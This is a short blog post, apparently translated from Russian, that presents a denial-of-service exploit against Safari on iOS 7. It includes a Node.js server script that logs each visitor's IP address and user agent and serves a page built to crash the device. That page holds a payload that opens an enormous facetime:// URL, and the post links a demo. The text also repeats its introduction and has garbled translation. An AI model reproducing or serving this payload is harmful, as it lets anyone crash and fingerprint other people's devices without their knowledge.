Reboot iOS. Simple and tasteful
Enjoy your day, ladies and gentlemen!
This post will be very short, unfortunately, but this is a demonstration of the vulnerability to which many iOS devices are exposed.
')
Almost all iOS devices of the 7th branch are subject, and partially 6'oy. No longer able to test. I would be extremely grateful if you unsubscribe in the comments about the behavior of your device.
Demonstration of work:
(alas, already absent)
r0sheR.js:
page.html: <- payload separately. As shown, it is more convenient
Demo: http://sn.im/28gw4wx
The bug is that Safari allows you to run FaceTime directly. An attacker could exploit this and cause a denial of service.Well, something else.
PS: Recently I found out that in version iOS 7.0.5 the vulnerability used by evasi0n7 will be closed.
How to know, you can expect JB already for iOS 7.1 :)
This post will be very short, unfortunately, but this is a demonstration of the vulnerability to which many iOS devices are exposed.
')
Almost all iOS devices of the 7th branch are subject, and partially 6'oy. No longer able to test. I would be extremely grateful if you unsubscribe in the comments about the behavior of your device.
Demonstration of work:
(alas, already absent)
r0sheR.js:
console.log(" _____ _ ______ _ "); console.log(" | _ | | | | ___ \\ (_) "); console.log(" _ __| |/' | ___| |__ ___| |_/ / _ ___ "); console.log("| '__| /| |/ __| '_ \\ / _ \\ / | / __|"); console.log("| | \\ |_/ /\\__ \\ | | | __/ |\\ \\ _| \\__ \\"); console.log("|_| \\___/ |___/_| |_|\\___\\_| \\_(_) |___/"); console.log("r0sheR.js is a part of IOS EX kit _/ |"); console.log(" fil9 (2013) fil9bob@gmail.com |__/"); var lport = process.argv[2]; if (!lport) { console.log('Usage: ' + process.argv[0] + ' ' + process.argv[1] + ' [80,8080...]'); process.exit(1) } else { if (lport <= 0 || lport > 65535) { console.log("Invalid port!\n"); process.exit(1) } }; var http = require('http'),fs=require('fs'); http.createServer(function (rq, rs) { rs.writeHead(200, { 'Content-Type': 'text/html' }); console.log('[!] New request from: ' + rq.connection.remoteAddress); console.log('[!] UserAgent: ' + rq.headers['user-agent']); fs.readFile('./page.html', function(err,data){ if (err) throw err; rs.end(data); }); console.log('DOS parcel sent :)') }).listen(lport, '0.0.0.0'); page.html: <- payload separately. As shown, it is more convenient
<html> <head> <title>IOS 7 CRASH</title> </head> <body> <script> document.location.replace("data:text/html,%3Cscript%3Eif(navigator.userAgent.indexOf('Safari') != -1){var a,b='';for(var i=1;i<=300000;i++) a='A'+a; document.location.replace('facetime://'+a+a+a+a)}%3C/script%3E"); </script> </body> </html> Demo: http://sn.im/28gw4wx
The bug is that Safari allows you to run FaceTime directly. An attacker could exploit this and cause a denial of service.
PS: Recently I found out that in version iOS 7.0.5 the vulnerability used by evasi0n7 will be closed.
How to know, you can expect JB already for iOS 7.1 :)
Source: https://habr.com/ru/post/208356/
All Articles